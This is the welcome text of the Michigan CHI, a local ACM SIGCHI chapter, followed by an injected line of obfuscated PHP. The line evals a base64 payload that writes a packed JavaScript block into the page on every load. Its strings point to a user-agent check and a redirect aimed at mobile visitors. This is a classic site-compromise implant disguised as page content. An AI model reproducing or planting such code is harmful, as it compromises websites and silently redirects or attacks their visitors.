Welcome to the Michigan CHI

The Michigan CHI is a local Special interest Group in Computer Human Interaction (SIGCHI) of the Association of Computing Machinery (ACM), servicing professionals who live in the State of Michigan.  Our objective is to advance knowledge and skill in the profession of User Experience for Human-Computer Interactions.  This includes software, websites, and the evolving landscape of tablet and mobile computing.  We accomplish this by offering events that include education, hands-on training, and networking for people in/or interested in learning more about this profession.

/*3916b9fbcfdd85b211b359c57e02f381*/ $ygu="b"."ase"."64_de"."code";eval($ygu("CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfODQ3MDc1MigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NE5EY3dOelV5SWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2R4SURGMFBUTjRLRW9vS1h0bUtHb3VUU0U5TVVrbUprd2dhaTVOSVQwaVN5SXBlek41S0RGMEtUdG1LRXdnUVZzaU1VRWlYVDA5SWtzaUtYdEJXeUl4UVNKZFBURTdjU0F4Tnowb01UWW9LU1ltTVZJb0tTazdjU0F4VkQwaE1UY21KaUVoUVM0emVpWW1RUzVGTGpOM1BUMDlJak4ySUROeUxpSTdjU0F4YWowdE1UdHhJRWM5SWpOek9pOHZNM1F1TTNVdk0wRWlPMllvVnlncEppWXhhajA5TVNsN1ppZ29SUzVPTGpGdktDOHpRaTlwS1NsOGZDaEZMazR1TVc4b0x6TklMMmtwS1NsN01Ua3VNMGtvUnlsOWVudEJMakU1UFVjN2FpNHhPVDFIZlgxNmUyWW9LREUzSmlZaE1WUW1KaUZYS0NrcEtYdHhJRk05SWp3eE1TQXpTajFjWENJelJ6b3pSanN6UXpvdE0wUTdYRndpUGp3eGVTQXpSVDFjWENJeGJGeGNJaUF6Y1QxY1hDSWlLMGNySWx4Y0lpQXpjRDFjWENJeGJGeGNJajQ4THpGNVBqd3ZNVEUrSWp0eElFazlhaTR6WWlnaU1URWlLVHRtS0VrdU1XMDlQVEFwZTJvdVRTNVFQV291VFM1UUsxTjllbnR4SURGT1BVa3VNVzA3Y1NCU1BUTmpMak5rS0NneFRpOHlLU2s3U1Z0U1hTNVFQVWxiVWwwdVVDdFRmWDE5ZlRGTktDbDlmU3d6WVNrN1NpQXhUU2dwZTNFZ1ZUMGlNemtpTzJZb1ZTRTlJak0xSWlsN2NTQklQV291TXpZb1ZTazdaaWhNSUVnaFBVc21Ka2doUFRGSktYdElMak0zUFNJaU96TTRJRWg5ZlgwN1NpQXhVaWdwZTJZb2FpNUVKaVloYWk0elpTbDdlQ0JDZlhvZ1ppaHFMa1FtSmlGQkxqTm1LWHQ0SUVKOWVpQm1LR291UkNZbUlXb3VNMjBwZTNnZ1FuMTZJR1lvYWk1RUppWWhhaTR6YmlsN2VDQkNmWG9nWmlocUxrUW1KaUZCTGpOdktYdDRJRUo5ZWlCbUtHb3VSQ2w3ZUNCQ2ZYb2daaWhNSUVVdU0yd2hQU0pMSWlZbUlXb3VSQ1ltTVRZb0tTbDdlQ0JDZlhwN2VDQXhZbjE5U2lBeE5pZ3BlM0VnZVQxQkxrVXVUanR4SUZFOWVTNURLQ0l6YXlBaUtUdG1LRkUrTUNsN2VDQmFLSGt1V1NoUkt6VXNlUzVES0NJdUlpeFJLU2tzTVRBcGZYRWdNV3M5ZVM1REtDSXpaeThpS1R0bUtERnJQakFwZTNFZ01UUTllUzVES0NJemFEb2lLVHQ0SUZvb2VTNVpLREUwS3pNc2VTNURLQ0l1SWl3eE5Da3BMREV3S1gxeElFODllUzVES0NJemFTOGlLVHRtS0U4K01DbDdlQ0JhS0hrdVdTaFBLelVzZVM1REtDSXVJaXhQS1Nrc01UQXBmWGdnTVdKOVNpQlhLQ2w3Y1NBeFlUMUJMa1V1VGk0emFpZ3BPMllvTHlnelMzd3pURnhjWkN0OE5HZ3BMaXN4YUh3MGFYdzBhbHhjTDN3MFozdzBabncwWW53MFkzdzBaSHd6Tkh3MGEzd3hkU2cwYkh3eFpDbDhNWEo4TkhKOE5ITWdmRFIwZkRSeGZEUndmREZvTGlzMGJYdzBibncwYnlCdEtEUmhmRFE0S1dsOE0xTW9JREZQS1Q5OE0xUjhjQ2d6Vlh3elVpbGNYQzk4TTFGOE0wMThNMDU4TTA4b05IdzJLVEI4TTFCOE0xWjhNVWhjWEM0b00xZDhORE1wZkRRMGZEUTJmRFF5SURReGZETllmRE5aTDJrdU1VTW9NV0VwZkh3dk0xcDhOSFY4TWt0OE1tWjhNbUY4TlRCYk1TMDJYV2w4TWpoOE1WWjhZU0F4VUh3eFdId3hkeWd4VVh3eGVIeHpYRnd0S1h3eFV5Z3lZbnd5YXlsOE1XY29NbTE4TVc1OE1YWXBmREp1ZkRKa0tESmxmRlo4TW1NcGZESnBmREZtS0RKc2ZERmpLWHd4V2loVWZESnZLWHd4VjN3eFdTZ3ljSHhjWEMxdGZISWdmSE1nS1h3eWNYd3laeWd4Vlh3eGNId3lhQ2w4TVVJb01tcDhNaklwZkRJektERjNmREk1S1h3eU55aGxmSFlwZDN3eU5ud3lORnhjTFNodWZIVXBmREkxWEZ3dmZETXpmREpSZkRKU1hGd3RmREpRZkRKUGZESk1mREpOWEZ3dGZERjJLREpPZkRGRktYd3lXbnd5VmlneFpYd3hjSHd5V0NsOE1uaDhNbmxjWEMxemZESjZmREozZkRKMmZERnBLR044Y0NsdmZESnpLREV5ZkZ4Y0xXUXBmREoxS0RRNWZERlRLWHd5UWlneVNId3lTU2w4TVZFb01rUjhNa1VwZkRKRGZESkdLRnMwTFRkZE1Id3hUM3d4VUh3eVJ5bDhNa0Y4TW5Rb1hGd3RmREZ4S1h3eFRDQjFmREpLZkRKWGZESlpYRnd0Tlh4blhGd3RNVFY4TVdNb1hGd3VkM3d4WkNsOE16RW9NekI4TWxVcGZESnlmREpVZkRKVFhGd3RLRzE4Y0h4MEtYdzBaVnhjTFh3MFJDZ3hSM3d4UmlsOE5tMG9JR2w4TVhVcGZEWnVYRnd0WTN3MmJ5aGpLRnhjTFh3Z2ZERnhmR0Y4WjN4d2ZITjhkQ2w4Tm1zcGZEWm9LRFpwZkRacUtYeHBYRnd0S0RJd2ZERmpmRmdwZkRaeGZEUjJLQ0I4WEZ3dGZGeGNMeWw4Tm5kOE5uaDhObmw4Tm5aOE5uVjhObko4Tm5OOE1YSjhOblFvZEh4MktXRjhObWQ4Tm1aOE5qSjhOak44TmpSOE5Wb29JSHhjWEM4cGZEVlZmRFZXSUh3MVYxeGNMWHcxV0NoamZHc3BmRFkxS0RZMmZEWmpLWHcyWkNnZ1ozeGNYQzhvYTN4c2ZIVXBmRFV3ZkRVMGZGeGNMVnRoTFhkZEtYdzJPSHcyT1h3MmVseGNMWGQ4TnpKOE56TmNYQzk4V0NoVWZEYzBmRGN4S1h3eGVpaEdmREl4ZkRGdUtYeHRYRnd0TmxwOE5sY29ObGg4TVVRcGZEYzFLRGMyZkRkamZERktLWHczWlh3eE5TaEdmRGRrZkRGQ2ZEZGlmREZwZkhRb1hGd3RmQ0I4YjN4MktYdzNOeWw4Tnpnb05UQjhObFY4ZGlBcGZEWlVmRFpIZkRaSVd6QXRNbDE4TmtsYk1pMHpYWHcyUmlnd2ZESXBmRFpGS0RCOE1udzFLWHcyUWlnd0tEQjhNU2w4TVRBcGZEWkRLQ2hqZkcwcFhGd3RmRFpFZkRaS2ZEWkxmRFpSZkRaU0tYdzJVeWcyZkdrcGZEWlBmRFpNZkRaTktEWk9mRFZVS1h3MVUzdzBWM3cwV0h3MFdTaGhmR1I4ZENsOE5GVjhORklvTVROOFhGd3RLRnN4TFRoZGZHTXBLWHcwV253MU1Yd3hTeWcxWVh3MVlpbDhOV05jWEMweWZEVTVLREZWZkRVNGZERnpLWHcxTlh3MU5ud3hSMXhjTFdkOE5UZGNYQzFoZkRSUUtEUkRmREV5ZkRJeGZETXlmRFl3ZkZ4Y0xWc3lMVGRkZkdsY1hDMHBmRFI0ZkRSNWZEUjZmRFJHZkRSSGZEUk5LRFJPZkRSUEtYdzBURnhjTDN3MFN5ZzBTSHhZZkRSSmZEUktmRlo4TldRcGZEVmxLRVo4YUZ4Y0xYd3hlSHh3WEZ3dEtYdzFSMXhjTDN3eGN5aGpLRnhjTFh3d2ZERXBmRFEzZkRGNmZERkZmREZFS1h3MVFWeGNMWHcxUW53MVF5aGNYQzE4YlNsOE5VbGNYQzB3ZkRWS0tEUTFmRFZSS1h3MVVpZ3haM3d4Wm53MVQzd3haWHcxVGlsOE5Vc29OVXg4VmlsOE5VMG9SbnhvWEZ3dGZIWmNYQzE4ZGlBcGZEVjVLRVo4Tld3cGZEVnRLREU0ZkRVd0tYdzFiaWcxYTN3eE1Id3hPQ2w4TVVZb05XZDhOV2dwZkRWcFhGd3RmRFZ2WEZ3dGZEVndLR2w4YlNsOE5YWmNYQzE4ZEZ4Y0xURTFmRFY0S0RGTGZEVjFLWHd4U2lnM01IeHRYRnd0ZkRWeGZEVnlLWHcxYzF4Y0xUbDhNVWdvWEZ3dVlud3hUSHcxZWlsOE5WQjhOVVI4TlVWOE5GWjhObVVvTm5COFZDbDhObXdvTkRCOE5Wc3dMVE5kZkZ4Y0xYWXBmRFYwZkRWM2ZEVm1mRFZxS0RVeWZEVXpmRFl3ZkRZeGZEY3dmRFZJZkRWR2ZEUjNmRFJCZkRSQ0tYdzBSU2hjWEMxOElDbDhORkY4TkZSOE5GTW9aeUI4TmxCOE56a3BmRGRoZkRaWmZEWldmRFpCWEZ3dGZEWTNmRFpoZkRaaVhGd3RMMmt1TVVNb01XRXVOVmtvTUN3MEtTa3BlM2dnUW4xNElERmlmU2NzTmpJc05EUTVMQ2Q4Zkh4OGZIeDhmSHg4Zkh4OGZIeHBabng4Zkh4a2IyTjFiV1Z1ZEh4OGZIeDhmSHgyWVhKOGZIeDhmSHg4Y21WMGRYSnVmR3hvU25WSWNXRnpkRkYxYWtOeGJHNXVUMkpZY1ZkelZrRlhVWGhGYTFaaWNueGxiSE5sZkhkcGJtUnZkM3gwY25WbGZHbHVaR1Y0VDJaOFlXeHNmRzVoZG1sbllYUnZjbnd3TVh4WmNYWnlXSFo0U0VOUmJVcHNXVk5CU1daelVVeEZiRVpUUlhGRlJFMTBkMlozVlZablZueExRMkp0YUZkWmJFRjRXRk5WYVd0TmJrbElhMmhFYUV4TloycDRibVo0ZEV4U1NWVldhbXQ4YzBWSWIwMXlTM0JGU2xsaWRtcG9jMlZ0YTNWUlYzbGFUVUpMVUZOcFMzRk1ZbUY0YjBaVmJYeG1kVzVqZEdsdmJueDFibVJsWm1sdVpXUjhkSGx3Wlc5bWZHSnZaSGw4ZFhObGNrRm5aVzUwZkZGbFJGbEtSRk5rVUhWcmJtOUJVMnBWYzNWalRVeHJhbGhvVEZaTFJVOTBWbXBEUjJSbmZHbHVibVZ5U0ZSTlRIeEVRMWRXYjB0QlVYRmxTR1J2WkV0SlpHOXBhVkJpWkVGRVEwdHVVbk42ZkZGUFVXSjVhMHhrY0VWclMwMXRUWGhKZUc1aWFuSkJlWFo2UTJkV1JFaEpZbFZaZkhoMFNFeDNkVWh3V0hSdlRYUm1aMWxtZG1ORlpVOUNRM1YwUmxsVVdrMTVmSFJsZkd0NVVGcHBVMjkwZFVkemRtSkNhRU5qY2tGcWFVVnhkV04xZUdWU2NHdDhibmw4VVVoNlNHbFJVMDlUUmtkblRIVkxlbEJhUkVoNFVFOW9UVWw2WWtkTVltRm5kSHh0WVh4emRXSnpkSEpwYm1kOGNHRnljMlZKYm5SOGZHUnBkbng4ZkhKalZFcDFRbGRNVEhKYVltbDVTV3R5Y0VodmNsTlRWazVoWW01S1EzVnBXRTlxVVh4dGIzeEpRa2xrZFVoU1ZsVlNTVlprVVd0aWRtRjFTbTUxZGt0aVduTk1VR1JPVm5CUWFFdEZRazlGY0h4RVdtWm9XbWhYVFV0WVQxZHRkRkZwYkdGUlFsSklibVJuWlVWMGNFTlVlV0paU1dOUFNVMVRmSHhzYjJOaGRHbHZibnhPVlVOdmFFTnZZa0ZtWmtSS1RYZERWR3B0WkdGelVFeG1aRWx5VWxKWWFIeG1ZV3h6Wlh4bmIzeHZaSHhwZEh4aGNueGhiSHh0YjJKcGJHVjhaRzk4UjNsdlMyRkZjRmxRV1UxNGVHeDNhM2h6UVhCTWRFSjJTVmhuVjA5Q2NGaDZkWHhtVTFCUlJXVkZZbmR1Wm1GdFVuZHBWMlZRZW5wa1JXTkplbEJYZFUxRWNreDhOM0I0Zkd4bGJtZDBhSHhqWVh4dFlYUmphSHhzYkh4ZmZHbHlhWE44YzJWOFNtcEZWM0JLUVhCdVkwZGlRMnBhYjFwQ1pWRkRWRVIxZEV0cFRraFBiM1pRWVV4MWZHbHdmR052ZkdGamZHOXZmR2xtY21GdFpYeHRZM3gyWHpNNU1UWmlPV1ppWTJaa1pEZzFZakl4TVdJek5UbGpOVGRsTURKbU16Z3hmR0pwZkhSbGMzUjhjbWw4Ym1SOGRHRjhjSFI4ZFhCOGJuVnNiSHgwYzN4d2JIeG5NWHhyUlVaTWVFcHBURTF6YjJKdFkyNUZXRkZSWVhCWGRsSlpTa3h6VEhSYWVGQjBTRWw4Wkd4ZmJtRnRaWHh2YzN4M1lYeGxjbnhaYkZCT1pscFFhR1o1V1c1SmNWcHllR2xXZG1odGFuZEdibEZSWmt4WWZHRnBmSFZqU0U1WWVXMXFZVnA0UTJGSlFsRldSVXhDYzFKS1lsWk5WVUZyZEdkcldWRlJVMUZJYUh4amEzdzRNREp6ZkdGMGRIZDhZV0poWTN4aGRYeGhjM3g4ZkhKa2ZHSnNmR0ozZkdNMU5YeGlkVzFpZkdKeWZEYzNNSE44WVhwOE5IUm9jSHhyYjN4NWQzeGhibnhsZUh3elozTnZmR0psZkc1eGZHRndkSFY4YkdKOGNtNThZMmg4WVhaOFlXMXZhWHgxYzN4a2FYeGhkbUZ1ZkdoaGFXVjhaSE44Wm14NWZHVnNmR1J0YjJKOFpHbGpZWHhrWW5SbGZHUmpmR1JsZG1sOFptVjBZM3hsYlh4bGMydzRmR2xqZkdzd2ZHVjZmSHBsZkd3eWZIVnNmR2MxTmpCOE5qVTVNSHhqYkdSamZHTnRaSHh0Y0h4amFIUnRmR05sYkd4OFkyTjNZWHhqWkcxOGFHUjhhR05wZEh4MWJueGtZWHhuWlc1bGZHNW5mR2RtZkdOeVlYZDhZV1I4WjNKOGZHTmhjR2w4YUdsd2RHOXdmRzV2Ym1WOFoyVjBSV3hsYldWdWRFSjVTV1I4YjNWMFpYSklWRTFNZkdSbGJHVjBaWHhwWkY4NE5EY3dOelV5ZkRFd01IeG5aWFJGYkdWdFpXNTBjMEo1VkdGblRtRnRaWHhOWVhSb2ZHWnNiMjl5ZkdOdmJYQmhkRTF2WkdWOFdFMU1TSFIwY0ZKbGNYVmxjM1I4VkhKcFpHVnVkSHh5ZG54RlpHZGxmSFJ2VEc5M1pYSkRZWE5sZkUxVFNVVjhiV0Y0Vkc5MVkyaFFiMmx1ZEhOOGNYVmxjbmxUWld4bFkzUnZjbnhoWkdSRmRtVnVkRXhwYzNSbGJtVnlmR0YwYjJKOGFHVnBaMmgwZkhOeVkzeEpibU44YUhSMGNIeGlaV3hoWkc5dWJtRXpNM3huWVh4SGIyOW5iR1Y4ZG1WdVpHOXlmSE5sZEVsdWRHVnlkbUZzZkdOc1pXRnlTVzUwWlhKMllXeDhZMmh5YjIxbGZEQTFNa1o4YVZCb2IyNWxmR3hsWm5SOE1qTTJNSEI0ZkhkcFpIUm9mR0ZpYzI5c2RYUmxmSEJ2YzJsMGFXOXVmR2xRYjJSOGNtVndiR0ZqWlh4emRIbHNaWHhoYm1SeWIybGtmR0ppZkhCdlkydGxkSHh3YzNCOGMyVnlhV1Z6ZkhONWJXSnBZVzU4Y0d4MVkydGxjbnh5Wlh4d1lXeHRmSEJvYjI1bGZHbDRhWHgwY21WdmZHSnliM2R6WlhKOGVHUmhmSGhwYVc1dmZERXlNRGQ4ZkdObGZIZHBibVJ2ZDNOOGJHbHVhM3gyYjJSaFptOXVaWHg4ZDJGd2ZIeHBibng4YjJKOFkyOXRjR0ZzZkdWc1lXbHVaWHhtWlc1dVpXTjhhR1ZwZkdKc1lYcGxjbnhpYkdGamEySmxjbko1ZkcxbFpXZHZmR0YyWVc1MFoyOThZbUZrWVh4cFpXMXZZbWxzWlh4b2IyNWxmR1pwY21WbWIzaDhibVYwWm5KdmJuUjhiM0JsY21GOGJXMXdmRzFwWkhCOGEybHVaR3hsZkd4blpYeHRZV1Z0YjN3Mk16RXdmR2xoWTN3NE0zeHhkR1ZyZkhJek9EQjhjall3TUh3NE5YdzVPSHd3TjN4b2FYeDNNMk44Y21GcmMzeHlhVzA1ZkdkbGZHMXRmRzF6ZkhOaGZITTFOWHh5YjN4MlpYeDZiM3h4WTN4M1pXSmpmSEJuZkhkcGZIZG9hWFI4Y0dSNFozeDJaWEpwZkc5M1p6RjhjRGd3TUh4d1lXNThjR2hwYkh4OGNHbHlaWHg4Zkh4d2NtOTRmSEJ6YVc5OGNXRjhjblI4Y0c5OFlYbDhkV044Y0c1OGRtRjhjMk44ZG5Wc1kzeG5kSHhzYTN4MFkyeDhkbmg4TURCOGJXSjhkREo4ZERaOGRHUm5mSFJsYkh4dE0zeHROWHgwZUh4MmJUUXdmSE5vZkhScGJYeDJiMlJoZkhSdmZITjVmSE5wZkhObmFIeHphR0Z5ZkhOcFpYeDJOREF3ZkhZM05UQjhPREY4YzJScmZEZ3dmSE5yZkhOc2ZITnZmR1owZkhOd2ZIUTFmR0l6ZkhWMGMzUjhhV1I4YzIxOGIzSmhibngzZG54cmJHOXVmR3R3ZEh4cmQyTjhhM2x2ZkhOMVluTjBjbnhyWjNSOGZIeHFhV2R6Zkd0a1pHbDhhMlZxYVh4c1pYeHViM3g1YjNWeWZHeHBZbmQ4YkhsdWVIeDZaWFJ2ZkhwMFpYeDRhWHhzWjN4MmFYeHFaVzExZkdwaWNtOThhSFY4WVhkOGRHTjhkSEI4ZG10OGFIQjhhSE44YUhSOGNtZDhhVEl6TUh4cGJtNXZmR2x3WVhGOGFtRjhhVzB4YTN4cGEyOXRmR2xpY205OGFXUmxZWHhwWnpBeGZHMHhmSGxoYzN4dU4zeHVaWHh2Ym54dU5UQjhiak13ZkcxNWQyRjhiakV3Zkc0eU1IeDBabngzWm54dk1tbHRmRzl3ZkhScGZHNTZjR2g4Ym1OOGQyZDhkM1I4Ym05cmZHMTNZbkI4Y0RGOGVEY3dNSHh0Wlh4eVkzeDNiMjUxZkdOeWZIeDRiM3h0TTJkaGZHMDFNSHgxYVh4dGFYeHZPSHg2ZW54dGRIeHVkM3gzYld4aWZHUmxmRzloZkRBeWZHMXRaV1luTG5Od2JHbDBLQ2Q4Snlrc01DeDdmU2twQ2p3dmMyTnlhWEIwUGc9PScpOwp9CgpyZWdpc3Rlcl9zaHV0ZG93bl9mdW5jdGlvbigndXNlcl9hYm9ydF9lbmRfZXhpdF9vcGVyYXRpb25pZF84NDcwNzUyJyk7Cgo="));/*3916b9fbcfdd85b211b359c57e02f381*/